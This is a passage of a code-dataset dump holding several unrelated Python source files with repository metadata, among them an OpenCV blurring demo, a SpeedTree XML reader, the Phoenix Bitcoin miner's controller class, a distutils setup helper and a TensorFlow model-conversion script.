origin HEAD:{branch} {tag}\n\"\"\".format(path=path, branch=branch, tag=(tag or '')))\n\n\nclass Settings:\n\n def __init__(self, path, section):\n self._settings = configparser.ConfigParser()\n if path:\n self._settings.read(path)\n self._section = section\n\n def get(self, option, as_list=False):\n if not self._settings.has_option(self._section, option):\n return None\n value = self._settings.get(self._section, option).split()\n if not as_list and len(value) == 1:\n value = value[0]\n return value\n","repo_name":"kernelci/kernelci-deploy","sub_path":"kernelci/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"16309475727","text":"import cv2 as cv\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\n\r\n\r\n\r\nimg = cv.imread(\"opencv-logo.png\")\r\nimg = cv.cvtColor(img,cv.COLOR_BGR2RGB)\r\n\r\nkernel = np.ones((5,5),np.float32)/25\r\ndst = cv.filter2D(img,-1,kernel)\r\nblur = cv.blur(img,(5,5))\r\ngblur = cv.GaussianBlur(img,(5,5),0)\r\nmedian = cv.medianBlur(img,5) #use for salt and pepper dots\r\nbilateralFilter = cv.bilateralFilter(img,9,75,75) #(src,diameter of area,color,color) for getting sharp edge\r\n\r\n\r\ntitles = [\"imgage\",\"2D convolution \",\"Blur\",\"GaussianBlur\",\"MedialBlur\",\"BilateralBlur\"]\r\nimages = [img,dst,blur,gblur,median,bilateralFilter]\r\n\r\nfor i in range(6):\r\n plt.subplot(2,4,i+1),plt.imshow(images[i],'gray')\r\n plt.title(titles[i])\r\n plt.xticks([]),plt.yticks([])\r\n\r\nplt.show() \r\n","repo_name":"vaishnavidatir/Opencv","sub_path":"smoothing_images_and_image_bluring.py","file_name":"smoothing_images_and_image_bluring.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70787239081","text":"import sys\nimport math\nimport xml.dom.minidom as xmldom\n\ndef xmlElementToType(node, tag, typeCast):\n return [typeCast(elt) for elt in node.getElementsByTagName(tag)[0].firstChild.toxml().split()]\n\ndef meshVertices(lod):\n vtx = lod.getElementsByTagName(\"Vertices\")[0]\n dataList = [ xmlElementToType(vtx, tag, float) for tag in [\"X\",\"Y\",\"Z\",\"TexcoordU\",\"TexcoordV\"] ]\n\n return {\n \"pnt\":list(zip(dataList[0],dataList[1],dataList[2])),\n \"u\":dataList[3],\n \"v\":dataList[4]\n }\n\ndef meshQuadIndices(lod):\n return xmlElementToType(lod, \"QuadIndices\", int)\n\ndef meshData(mesh):\n return {\n \"id\":mesh.attributes[\"ID\"].value,\n \"name\":mesh.attributes[\"Name\"].value.replace(\" \",\"_\"),\n \"LOD\":[{\n \"level\":float(lod.attributes[\"Level\"].value),\n \"scale\":float(lod.attributes[\"OriginalScale\"].value),\n \"quadIdx\":meshQuadIndices(lod),\n \"triIdx\":xmlElementToType(lod, \"TriangleIndices\", int),\n \"vtx\":meshVertices(lod)} for lod in mesh.getElementsByTagName(\"LOD\")]\n }\n\ndef readMeshes(doc):\n meshes = doc.getElementsByTagName('Meshes')\n # print(meshes[0].firstChild.toxml())\n meshList = []\n \n for mesh in meshes[0].getElementsByTagName('Mesh'):\n meshList.append(meshData(mesh))\n\n return meshList\n\n# def readFoliages(doc):\n# foliages = []\n# for LeafReferences in doc.getElementsByTagName('LeafReferences'):\n# pntList = [ xmlElementToType(LeafReferences, tag, float) for tag in [\"X\",\"Y\",\"Z\"] ]\n# rotAxisList = [ xmlElementToType(LeafReferences, tag, float) for tag in [\"RotAxisX\",\"RotAxisY\",\"RotAxisZ\"] ]\n\n# foliages.append( {\n# \"pnt\":list(zip(*pntList)),\n# \"rotAxis\":list(zip(*rotAxisList)),\n# \"rotRadian\":[math.radians(angle) for angle in xmlElementToType(LeafReferences, \"RotAngle\", float)],\n# \"scale\":xmlElementToType(LeafReferences, \"Scale\", float),\n# \"meshId\":xmlElementToType(LeafReferences, \"MeshID\", int),\n# \"boneId\":xmlElementToType(LeafReferences, \"BoneID\", int)\n# } )\n\n# return foliages\n\ndef boneData(bone):\n return {\n \"id\":int(bone.attributes[\"ID\"].value),\n \"parentId\":int(bone.attributes[\"ParentID\"].value),\n \"radius\":float(bone.attributes[\"Radius\"].value),\n \"mass\":float(bone.attributes[\"Mass\"].value),\n \"start\":[float(bone.attributes[\"StartX\"].value),float(bone.attributes[\"StartY\"].value),float(bone.attributes[\"StartZ\"].value)],\n \"end\":[float(bone.attributes[\"EndX\"].value),float(bone.attributes[\"EndY\"].value),float(bone.attributes[\"EndZ\"].value)]\n }\n\ndef spineData(spine):\n pntList = [ xmlElementToType(spine, tag, float) for tag in [\"X\",\"Y\",\"Z\"] ]\n return {\n \"pnt\":list(zip(*pntList)),\n \"radius\":xmlElementToType(spine, \"Radius\", float)\n }\n\ndef readBones(doc):\n return {\n \"spine\":[spineData(spine) for spine in doc.getElementsByTagName('Spine')],\n \"bones\":[boneData(bone) for bone in doc.getElementsByTagName('Bone')]\n }\n\ndef readObjects(doc):\n objList = []\n for obj in doc.getElementsByTagName('Object')[1:]:\n objData={}\n objData['name'] = obj.attributes[\"Name\"].value.replace(\" \",\"_\")\n objData['id'] = int(obj.attributes[\"ID\"].value)\n \n points = obj.getElementsByTagName('Points')[0]\n objData['pntNum'] = int(points.attributes[\"Count\"].value)\n pntList = [ xmlElementToType(points, tag, float) for tag in [\"X\",\"Y\",\"Z\"] ]\n objData['pnt'] = list(zip(*pntList))\n\n vtx = obj.getElementsByTagName('Vertices')[0]\n objData['u'] = xmlElementToType(vtx, \"TexcoordU\", float)\n objData['v'] = xmlElementToType(vtx, \"TexcoordV\", float)\n\n objData[\"boneId\"] = xmlElementToType(vtx, \"BoneID\", int)\n\n tri = obj.getElementsByTagName('Triangles')[0]\n objData[\"triangleNum\"] = int(tri.attributes[\"Count\"].value)\n objData[\"pntIdx\"] = xmlElementToType(tri, \"PointIndices\", int)\n objData[\"vtxIdx\"] = xmlElementToType(tri, \"VertexIndices\", int)\n\n objData[\"orgP\"] = [ float(obj.attributes['AbsX'].value), float(obj.attributes['AbsY'].value), float(obj.attributes['AbsZ'].value) ]\n\n leafRefList = obj.getElementsByTagName('LeafReferences')\n\n if leafRefList:\n leafRef = leafRefList[0]\n pntList = [ xmlElementToType(leafRef, tag, float) for tag in [\"X\",\"Y\",\"Z\"] ]\n rotAxisList = [ xmlElementToType(leafRef, tag, float) for tag in [\"RotAxisX\",\"RotAxisY\",\"RotAxisZ\"] ]\n\n objData[\"LeafRef\"] = {\n \"pnt\":list(zip(*pntList)),\n \"rotAxis\":list(zip(*rotAxisList)),\n \"rotRadian\":[math.radians(angle) for angle in xmlElementToType(leafRef, \"RotAngle\", float)],\n \"scale\":xmlElementToType(leafRef, \"Scale\", float),\n \"meshId\":xmlElementToType(leafRef, \"MeshID\", int),\n \"boneId\":xmlElementToType(leafRef, \"BoneID\", int)\n }\n\n objList.append(objData)\n\n return objList\n\ndef readTree(xmlFile):\n doc = xmldom.parse(xmlFile)\n return {\n \"objects\":readObjects(doc),\n \"meshes\":readMeshes(doc),\n # \"foliages\":readFoliages(doc),\n \"bones\":readBones(doc)\n }\n\nif __name__ == \"__main__\":\n readTree(sys.argv[1])\n","repo_name":"bambooshoot/tree","sub_path":"py/speedTreeRawXml.py","file_name":"speedTreeRawXml.py","file_ext":"py","file_size_in_byte":5344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7101000405","text":"import platform\nfrom time import time\nfrom twisted.internet import reactor\nfrom minerutil.MMPProtocol import MMPClient\nfrom KernelInterface import KernelInterface\n\n#The main managing class for the miner itself.\nclass Miner(object):\n\n # This must be manually set for Git\n VER = (1, 7, 5)\n REVISION = reduce(lambda x,y: x*100+y, VER)\n VERSION = 'v%s' % '.'.join(str(x) for x in VER)\n\n def __init__(self):\n self.logger = None\n self.options = None\n self.connection = None\n self.kernel = None\n self.queue = None\n self.idle = True\n self.cores = []\n self.backup = False\n self.failures = 0\n self.lastMetaRate = 0.0\n self.lastRateUpdate = time()\n\n # Connection callbacks...\n def onFailure(self):\n self.logger.reportConnectionFailed()\n\n #handle failover if url2 has been specified\n if self.options.url2 is not None:\n self.failoverCheck()\n\n def onConnect(self):\n self.logger.reportConnected(True)\n def onDisconnect(self):\n self.logger.reportConnected(False)\n def onBlock(self, block):\n self.logger.reportBlock(block)\n def onMsg(self, msg):\n self.logger.reportMsg(msg)\n def onWork(self, work):\n self.logger.reportDebug('Server gave new work; passing to WorkQueue')\n self.queue.storeWork(work)\n def onLongpoll(self, lp):\n self.logger.reportType('RPC' + (' (+LP)' if lp else ''))\n def onPush(self, ignored):\n self.logger.log('LP: New work pushed')\n def onLog(self, message):\n self.logger.log(message)\n def onDebug(self, message):\n self.logger.reportDebug(message)\n\n def failoverCheck(self):\n if self.backup:\n if (self.failures >= 1):\n #disconnect and set connection to none\n self.connection.disconnect()\n self.connection = None\n\n #log\n self.logger.log(\"Backup server failed,\")\n self.logger.log(\"attempting to return to primary server.\")\n\n #reset failure count and return to primary server\n self.failures = 0\n self.backup = False\n self.connection = self.options.makeConnection(self)\n self.connection.connect()\n else:\n self.failures += 1\n else:\n #The main pool must fail 3 times before moving to the backup pool\n if (self.failures >= 2):\n #disconnect and set connection to none\n self.connection.disconnect()\n self.connection = None\n\n #log\n self.logger.log(\"Primary server failed too many times,\")\n self.logger.log(\"attempting to connect to backup server.\")\n\n #reset failure count and connect to backup server\n self.failures = 0\n self.backup = True\n self.connection = self.options.makeConnection(self, True)\n self.connection.connect()\n else:\n self.failures += 1\n\n #since the main pool may fail from time to time, decrement the\n #failure count after 5 minutes so we don't end up moving to the\n #back pool when it isn't nessesary\n def decrementFailures():\n if self.failures > 1 and (not self.backup):\n self.failures -= 1\n reactor.callLater(300, decrementFailures)\n\n def start(self, options):\n #Configures the Miner via the options specified and begins mining.\n\n self.options = options\n self.logger = self.options.makeLogger(self, self)\n self.connection = self.options.makeConnection(self)\n self.kernel = self.options.makeKernel(KernelInterface(self))\n self.queue = self.options.makeQueue(self)\n\n #log a message to let the user know that phoenix is starting\n self.logger.log(\"Phoenix %s starting...\" % self.VERSION)\n\n #this will need to be changed to add new protocols\n if isinstance(self.connection, MMPClient):\n self.logger.reportType('MMP')\n else:\n self.logger.reportType('RPC')\n\n self.applyMeta()\n\n # Go!\n self.connection.connect()\n self.kernel.start()\n reactor.addSystemEventTrigger('before', 'shutdown', self.shutdown)\n\n def shutdown(self):\n \"\"\"Disconnect from the server and kill the kernel.\"\"\"\n self.kernel.stop()\n self.connection.disconnect()\n\n def applyMeta(self):\n #Applies any static metafields to the connection, such as version,\n #kernel, hardware, etc.\n\n # It's important to note here that the name is already put in place by\n # the Options's makeConnection function, since the Options knows the\n # user's desired name for this miner anyway.\n\n self.connection.setVersion(\n 'phoenix', 'Phoenix Miner', self.VERSION)\n system = platform.system() + ' ' + platform.version()\n self.connection.setMeta('os', system)\n\n #called by CoreInterface to add cores for total hashrate calculation\n def _addCore(self, core):\n self.cores.append(core)\n\n #used by WorkQueue to report when the miner is idle\n def reportIdle(self, idle):\n\n #if idle status has changed force an update\n if self.idle != idle:\n if idle:\n self.idle = idle\n self.logger.log(\"Warning: work queue empty, miner is idle\")\n self.logger.reportRate(0, True)\n self.connection.setMeta('rate', 0)\n self.lastMetaRate = time()\n self.idleFixer()\n else:\n self.idle = idle\n self.logger.updateStatus(True)\n\n #request work from the protocol every 15 seconds while idle\n def idleFixer(self):\n if self.idle:\n self.connection.requestWork()\n reactor.callLater(15, self.idleFixer)\n\n def updateAverage(self):\n #Query all mining cores for their Khash/sec rate and sum.\n\n total = 0\n if not self.idle:\n for core in self.cores:\n total += core.getRate()\n\n self.logger.reportRate(total)\n\n # Let's not spam the server with rate messages.\n if self.lastMetaRate+30 < time():\n self.connection.setMeta('rate', total)\n self.lastMetaRate = time()","repo_name":"jedi95/Phoenix-Miner","sub_path":"Miner.py","file_name":"Miner.py","file_ext":"py","file_size_in_byte":6470,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"18"} +{"seq_id":"27254448197","text":"# Author: Forest Bond\n# This file is in the public domain.\n\nfrom __future__ import with_statement, unicode_literals\n\nimport os, sys, shutil\nfrom tempfile import mkdtemp\nfrom modulefinder import Module\nfrom distutils.command.build import build\nfrom distutils.command.clean import clean as _clean\nfrom distutils.command.install import install\nfrom distutils.command.install_lib import install_lib as _install_lib\nfrom distutils.command.install_data import install_data as _install_data\nfrom distutils.core import (\n setup as _setup,\n Command,\n)\nfrom distutils.spawn import spawn\nfrom distutils import log\nfrom distutils.dir_util import remove_tree\nfrom distutils.dist import Distribution\n\ntry:\n from py2exe.build_exe import py2exe as _py2exe\nexcept ImportError:\n _py2exe = None\nelse:\n from py2exe.build_exe import byte_compile\n\n\n###\n\n\nclass test(Command):\n description = 'run tests'\n user_options = [\n ('tests=', None, 'names of tests to run'),\n ('print-only', None, \"don't run tests, just print their names\"),\n ('coverage', None, \"print coverage analysis (requires coverage.py)\"),\n ]\n\n def initialize_options(self):\n self.tests = None\n self.print_only = False\n self.coverage = False\n\n def finalize_options(self):\n if self.tests is not None:\n self.tests = self.tests.split(',')\n\n def run(self):\n build_obj = self.get_finalized_command('build')\n build_obj.run()\n sys.path.insert(0, build_obj.build_lib)\n try:\n mod = __import__(self.distribution.test_module)\n main = getattr(mod, 'main')\n main(\n test_names = self.tests,\n print_only = self.print_only,\n coverage = self.coverage,\n )\n finally:\n sys.path.remove(build_obj.build_lib)\n\n\nDistribution.test_module = 'tests'\n\n\n###\n\n\nclass clean(_clean):\n user_options = _clean.user_options + [\n ('build-man=', None, 'manpage build directory'),\n ]\n\n def initialize_options(self):\n _clean.initialize_options(self)\n self.build_man = None\n\n def finalize_options(self):\n _clean.finalize_options(self)\n self.set_undefined_options('build_man', ('build_dir', 'build_man'))\n\n def run(self):\n if self.all:\n if os.path.exists(self.build_man):\n remove_tree(self.build_man, dry_run = self.dry_run)\n else:\n log.debug(\n \"'%s' does not exist -- can't clean it\",\n self.build_man,\n )\n\n _clean.run(self)\n\n\n###\n\n\nclass build_man(Command):\n user_options = _install_data.user_options + [\n ('build-dir=', 'b', 'manpage build directory'),\n ]\n description = 'Build manual pages from docbook XML.'\n\n xsltproc = ['xsltproc', '--nonet', '--novalid', '--xinclude']\n\n def initialize_options(self):\n self.build_base = None\n self.build_dir = None\n\n def finalize_options(self):\n self.set_undefined_options('build', ('build_base', 'build_base'))\n if self.build_dir is None:\n self.build_dir = os.path.join(self.build_base, 'man')\n self.docbook_files = []\n if self.distribution.manpage_sources is not None:\n unclaimed_files = list(self.distribution.manpage_sources)\n for index, filename in enumerate(list(unclaimed_files)):\n if filename.endswith('.xml'):\n self.docbook_files.append(os.path.abspath(filename))\n del unclaimed_files[index]\n if unclaimed_files:\n log.error(\n 'unknown manpage source file types: %s',\n ', '.join(unclaimed_files),\n )\n raise SystemExit(1)\n\n def _find_docbook_manpage_stylesheet(self):\n from libxml2 import catalogResolveURI\n return catalogResolveURI(\n 'http://docbook.sourceforge.net/release/xsl/current/manpages/docbook.xsl'\n )\n\n def build_manpage_from_docbook(self, stylesheet, docbook_file):\n if stylesheet is None:\n raise AssertionError('stylesheet is None')\n\n command = self.xsltproc + [stylesheet, docbook_file]\n orig_wd = os.getcwd()\n os.chdir(self.build_dir)\n try:\n spawn(command, dry_run = self.dry_run)\n finally:\n os.chdir(orig_wd)\n\n def run(self):\n if self.docbook_files:\n stylesheet = self._find_docbook_manpage_stylesheet()\n\n if stylesheet is None:\n log.warn(\n 'Warning: missing docbook XSL stylesheets; '\n 'manpages will not be built.\\n'\n 'Please install the docbook XSL stylesheets from '\n 'http://docbook.org/.'\n )\n\n else:\n if not self.dry_run:\n if not os.path.exists(self.build_dir):\n os.mkdir(self.build_dir)\n for docbook_file in self.docbook_files:\n log.info('building manpage from docbook: %s', docbook_file)\n if not self.dry_run:\n self.build_manpage_from_docbook(\n stylesheet,\n docbook_file,\n )\n\nDistribution.manpage_sources = None\n\nbuild.sub_commands.append((\n 'build_man',\n (lambda self: bool(self.distribution.manpage_sources)),\n))\n\n\nclass install_man(_install_data):\n def initialize_options(self):\n _install_data.initialize_options(self)\n self.build_dir = None\n\n def finalize_options(self):\n _install_data.finalize_options(self)\n self.set_undefined_options('build_man', ('build_dir', 'build_dir'))\n\n self.data_files = []\n\n if os.path.exists(self.build_dir):\n for entry in os.listdir(self.build_dir):\n path = os.path.join(self.build_dir, entry)\n if os.path.isfile(path):\n base, ext = os.path.splitext(entry)\n section = int(ext[1:])\n self.data_files.append(\n ('share/man/man%u' % section, [path])\n )\n\ninstall.sub_commands.append((\n 'install_man',\n (lambda self: bool(self.distribution.manpage_sources)),\n))\n\n\n###\n\n\nclass _DistinfoMixin:\n def _split_distinfo_module(self):\n parts = self.distribution.distinfo_module.split('.')\n return parts[:-1], parts[-1]\n\n def _prepare_distinfo_string(self, value):\n #if isinstance(value, str):\n # value = unicode(value)\n #return unicode(repr(value)).encode('utf-8')r\n return value\n\n def _write_distinfo_module(self, outfile, distinfo = (), imports = ()):\n distinfo = list(distinfo)\n imports = list(imports)\n\n distinfo.insert(\n 0,\n (\n 'version',\n self._prepare_distinfo_string(self.distribution.metadata.version),\n ),\n )\n\n log.info(\"creating distinfo file %r:\", outfile)\n for k, v in distinfo:\n log.info(' %s = %s', k, v)\n\n if not self.dry_run:\n with open(outfile, 'wb') as f:\n f.write(b'# coding: utf-8\\n')\n f.write(b'\\n')\n for modname in imports:\n f.write(b'import %s\\n' % modname)\n if imports:\n f.write(b'\\n')\n for k, v in distinfo:\n line = '%s = \"%s\"\\n' % (k, v)\n f.write(line.encode('utf8'))\n\n\n###\n\n\nclass install_data(_install_data):\n user_options = _install_data.user_options + [\n (\n 'install-dir-arch=',\n None,\n 'base directory for installing architecture-dependent data files',\n ),\n (\n 'install-dir-arch-pkg=',\n None,\n 'package-specific directory for installing architecture-dependent data files',\n ),\n (\n 'install-dir-indep=',\n None,\n 'base directory for installing architecture-independent data files',\n ),\n (\n 'install-dir-indep-pkg=',\n None,\n 'package-specific directory for installing architecture-independent data files',\n ),\n ]\n\n def initialize_options(self):\n _install_data.initialize_options(self)\n\n self.install_dir_arch = None\n self.install_dir_arch_pkg = None\n self.install_dir_indep = None\n self.install_dir_indep_pkg = None\n\n self.data_files_arch = self.distribution.data_files_arch\n self.data_files_arch_pkg = self.distribution.data_files_arch_pkg\n self.data_files_indep = self.distribution.data_files_indep\n self.data_files_indep_pkg = self.distribution.data_files_indep_pkg\n\n def _get_relative_install_dir(self, p):\n return p[len(self.install_dir) + len(os.sep):]\n\n def finalize_options(self):\n _install_data.finalize_options(self)\n\n py2exe_obj = self.distribution.get_command_obj('py2exe', False)\n if py2exe_obj is not None:\n py2exe_obj.ensure_finalized()\n\n if (py2exe_obj is not None) and (\n self.install_dir == py2exe_obj.dist_dir\n ):\n self.install_dir_arch = self.install_dir\n self.install_dir_arch_pkg = self.install_dir\n self.install_dir_indep = self.install_dir\n self.install_dir_indep_pkg = self.install_dir\n\n else:\n if self.install_dir_arch is None:\n if sys.platform == 'win32':\n self.install_dir_arch = self.install_dir\n else:\n self.install_dir_arch = os.path.join(self.install_dir, 'lib')\n\n if self.install_dir_arch_pkg is None:\n self.install_dir_arch_pkg = os.path.join(\n self.install_dir_arch,\n self.distribution.metadata.name,\n )\n\n if self.install_dir_indep is None:\n if sys.platform == 'win32':\n self.install_dir_indep = self.install_dir\n else:\n self.install_dir_indep = os.path.join(self.install_dir, 'share')\n\n if self.install_dir_indep_pkg is None:\n self.install_dir_indep_pkg = os.path.join(\n self.install_dir_indep,\n self.distribution.metadata.name,\n )\n\n if self.data_files is None:\n self.data_files = []\n\n if self.data_files_arch:\n self.data_files.extend(self._gen_data_files(\n self._get_relative_install_dir(self.install_dir_arch),\n self.data_files_arch,\n ))\n\n if self.data_files_arch_pkg:\n self.data_files.extend(self._gen_data_files(\n self._get_relative_install_dir(self.install_dir_arch_pkg),\n self.data_files_arch_pkg,\n ))\n\n if self.data_files_indep:\n self.data_files.extend(self._gen_data_files(\n self._get_relative_install_dir(self.install_dir_indep),\n self.data_files_indep,\n ))\n\n if self.data_files_indep_pkg:\n self.data_files.extend(self._gen_data_files(\n self._get_relative_install_dir(self.install_dir_indep_pkg),\n self.data_files_indep_pkg,\n ))\n\n def _gen_data_files(self, base_dir, data_files):\n for arg in data_files:\n if isinstance(arg, basestring):\n yield (base_dir, [arg])\n else:\n subdir, filenames = arg\n yield (os.path.join(base_dir, subdir), filenames)\n\n\nDistribution.data_files_arch = None\nDistribution.data_files_arch_pkg = None\nDistribution.data_files_indep = None\nDistribution.data_files_indep_pkg = None\n\n\norig_has_data_files = Distribution.has_data_files\n\ndef has_data_files(self):\n if orig_has_data_files(self):\n return True\n return any([\n self.data_files_arch,\n self.data_files_arch_pkg,\n self.data_files_indep,\n self.data_files_indep_pkg,\n ])\n\nDistribution.has_data_files = has_data_files\n\n\n###\n\n\nclass install_lib(_DistinfoMixin, _install_lib):\n def initialize_options(self):\n _install_lib.initialize_options(self)\n\n self.distinfo_package = None\n self.distinfo_module = None\n\n def finalize_options(self):\n _install_lib.finalize_options(self)\n\n if self.distribution.distinfo_module is not None:\n self.distinfo_package, self.distinfo_module = \\\n self._split_distinfo_module()\n\n def install(self):\n retval = _install_lib.install(self)\n\n if retval is None:\n return retval\n\n py2exe_obj = self.distribution.get_command_obj('py2exe', False)\n\n if (py2exe_obj is None) and (self.distinfo_package is not None):\n parts = [self.install_dir]\n parts.extend(self.distinfo_package)\n parts.append('%s.py' % self.distinfo_module)\n installed_module_path = os.path.join(*parts)\n\n install_obj = self.get_finalized_command('install')\n install_data_obj = self.get_finalized_command('install_data')\n\n distinfo = [\n (\n 'install_base',\n self._prepare_distinfo_string(os.path.abspath(\n install_obj.install_base,\n )),\n ),\n (\n 'install_platbase',\n self._prepare_distinfo_string(os.path.abspath(\n install_obj.install_platbase,\n )),\n ),\n (\n 'install_purelib',\n self._prepare_distinfo_string(os.path.abspath(\n install_obj.install_purelib,\n )),\n ),\n (\n 'install_platlib',\n self._prepare_distinfo_string(os.path.abspath(\n install_obj.install_platlib,\n )),\n ),\n (\n 'install_lib',\n self._prepare_distinfo_string(os.path.abspath(\n install_obj.install_lib,\n )),\n ),\n (\n 'install_headers',\n self._prepare_distinfo_string(os.path.abspath(\n install_obj.install_headers,\n )),\n ),\n (\n 'install_scripts',\n self._prepare_distinfo_string(os.path.abspath(\n install_obj.install_scripts,\n )),\n ),\n (\n 'install_data',\n self._prepare_distinfo_string(os.path.abspath(\n install_data_obj.install_dir,\n )),\n ),\n (\n 'install_data_arch',\n self._prepare_distinfo_string(os.path.abspath(\n install_data_obj.install_dir_arch,\n )),\n ),\n (\n 'install_data_arch_pkg',\n self._prepare_distinfo_string(os.path.abspath(\n install_data_obj.install_dir_arch_pkg,\n )),\n ),\n (\n 'install_data_indep',\n self._prepare_distinfo_string(os.path.abspath(\n install_data_obj.install_dir_indep,\n )),\n ),\n (\n 'install_data_indep_pkg',\n self._prepare_distinfo_string(os.path.abspath(\n install_data_obj.install_dir_indep_pkg,\n )),\n ),\n ]\n\n self._write_distinfo_module(installed_module_path, distinfo)\n\n retval.append(installed_module_path)\n\n return retval\n\n\nif _py2exe is None:\n py2exe = None\nelse:\n class py2exe(_DistinfoMixin, _py2exe):\n def make_lib_archive(self, *args, **kwargs):\n if self.distribution.distinfo_module is not None:\n imports = ['os', 'sys']\n distinfo = [\n (\n 'install_data',\n 'os.path.dirname(sys.executable)',\n ),\n (\n 'install_data_arch',\n 'os.path.dirname(sys.executable)',\n ),\n (\n 'install_data_arch_pkg',\n 'os.path.dirname(sys.executable)',\n ),\n (\n 'install_data_indep',\n 'os.path.dirname(sys.executable)',\n ),\n (\n 'install_data_indep_pkg',\n 'os.path.dirname(sys.executable)',\n ),\n ]\n\n tmp_dir_path = mkdtemp()\n try:\n distinfo_package, distinfo_module = self._split_distinfo_module()\n tmp_file_parent_path = os.path.join(\n tmp_dir_path,\n *distinfo_package\n )\n os.makedirs(tmp_file_parent_path)\n tmp_file_path = os.path.join(\n tmp_file_parent_path,\n ('%s.py' % distinfo_module),\n )\n self._write_distinfo_module(tmp_file_path, distinfo, imports)\n sys.path.insert(0, tmp_dir_path)\n try:\n self._distinfo_compiled_files = byte_compile(\n [Module(\n name = self.distribution.distinfo_module,\n file = tmp_file_path,\n )],\n target_dir = self.collect_dir,\n optimize = self.optimize,\n force = 0,\n verbose = self.verbose,\n dry_run = self.dry_run,\n )\n finally:\n del sys.path[0]\n finally:\n shutil.rmtree(tmp_dir_path)\n\n self.compiled_files.extend(self._distinfo_compiled_files)\n\n return _py2exe.make_lib_archive(self, *args, **kwargs)\n\n\nDistribution.distinfo_module = None\n\n\n###\n\n\ndef setup(*args, **kwargs):\n cmdclass = kwargs.setdefault('cmdclass', {})\n kwargs['cmdclass'].setdefault('test', test)\n kwargs['cmdclass'].setdefault('install_data', install_data)\n kwargs['cmdclass'].setdefault('install_lib', install_lib)\n kwargs['cmdclass'].setdefault('build_man', build_man)\n kwargs['cmdclass'].setdefault('install_man', install_man)\n kwargs['cmdclass'].setdefault('clean', clean)\n if py2exe is not None:\n kwargs['cmdclass'].setdefault('py2exe', py2exe)\n return _setup(*args, **kwargs)\n","repo_name":"dsuch/zato-ext-inotifyx","sub_path":"setuplib.py","file_name":"setuplib.py","file_ext":"py","file_size_in_byte":18835,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"3999460064","text":"r\"\"\"Reverses xxd dump, i.e, converts a C++ source file back to a TFLite file.\n\nThis script is used to convert a model from a C++ source file (dumped with xxd)\nback to it's original TFLite file format in order to analyze it with either a\nmodel visualizer like Netron (https://github.com/lutzroeder/netron) or to\nevaluate the model using the Python TensorFlow Lite Interpreter API.\n\nThe xxd command to dump the TFLite file to a C++ source file looks like:\nxxd -i model_data.tflite > model_data.cc\n\n\"\"\"\nfrom absl import app\nfrom absl import flags\n\nfrom tensorflow.lite.tools import flatbuffer_utils\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_string('input_cc_file', None,\n 'Full path name to the input C++ source file.')\nflags.DEFINE_string('output_tflite_file', None,\n 'Full path name to the output TFLite file.')\n\nflags.mark_flag_as_required('input_cc_file')\nflags.mark_flag_as_required('output_tflite_file')\n\n\ndef main(_):\n model = flatbuffer_utils.xxd_output_to_object(FLAGS.input_cc_file)\n flatbuffer_utils.write_model(model, FLAGS.output_tflite_file)\n\n\nif __name__ == '__main__':\n app.run(main)\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/lite/tools/reverse_xxd_dump_from_cc.py","file_name":"reverse_xxd_dump_from_cc.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"} +{"seq_id":"22636651719","text":"# 캠핑장 => 연속하는 P일 중 L일동안만 사용가능\n# V일짜리 휴가\nimport sys\ncase = 1\nanswer = [] \nwhile True :\n l, p, v = map(int,sys.stdin.readline().split())\n if l == 0 and p == 0 and v == 0 :\n break\n temp = v // p\n result = temp * l + min(v % p, l)\n answer.append([\"Case \" + str(case) +': ' + str(result)])\n case += 1\n\nfor ans in answer:\n print(''.join(ans))","repo_name":"jooyun-1/PS_repo","sub_path":"Practice/baek4796.py","file_name":"baek4796.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13721905544","text":"import threading\nimport time\nimport logging\n\n\ndef tfunc(value):\n i = 0\n print(\"Start\")\n #while True:\n time.sleep(5)\n print(\"Value: \", i)\n i += 1\n\ndef main():\n print(\"Hallo\")\n format = \"%(asctime)s: %(message)s\"\n logging.basicConfig(format=format, level=logging.INFO, datefmt=\"%H:%M:%S\")\n logging.info(\"Main : before creating thread\")\n x = threading.Thread(target=tfunc, args=(34, ))\n x.daemon = True\n x.start()\n logging.info(\"Main : wait\")\n #x.join()\n logging.info(\"Main : ready\")\n \n\n\nif __name__ == \"__main__\":\n main()","repo_name":"floggy22/initscript","sub_path":"versuche/app/thread.py","file_name":"thread.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7075682295","text":"import typing as tp\n\nfrom .base import Operation, TRow, TRowsGenerator\n\n\n__all__ = [\n 'Read',\n 'ReadIterFactory'\n]\n\n\nclass Read(Operation):\n \"\"\"Generator of parsed rows from file\"\"\"\n\n def __init__(self, filename: str, parser: tp.Callable[[str], TRow]) -> None:\n \"\"\"\n :param filename: File to read from\n :param parser: Parser used to make TRow from string\n \"\"\"\n self.filename = filename\n self.parser = parser\n\n def __call__(self, *args: tp.Any, **kwargs: tp.Any) -> TRowsGenerator:\n with open(self.filename) as f:\n for line in f:\n yield self.parser(line)\n\n\nclass ReadIterFactory(Operation):\n \"\"\"Generator of rows from key-word argument\"\"\"\n\n def __init__(self, name: str) -> None:\n \"\"\"\n :param name: Key of argument\n \"\"\"\n self.name = name\n\n def __call__(self, *args: tp.Any, **kwargs: tp.Any) -> TRowsGenerator:\n for row in kwargs[self.name]():\n yield row\n","repo_name":"Alexander4127/compgraph","sub_path":"compgraph/operations/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7575069864","text":"#to convert celcius to Fahrenheit and vice vera using python\r\nfrom tkinter 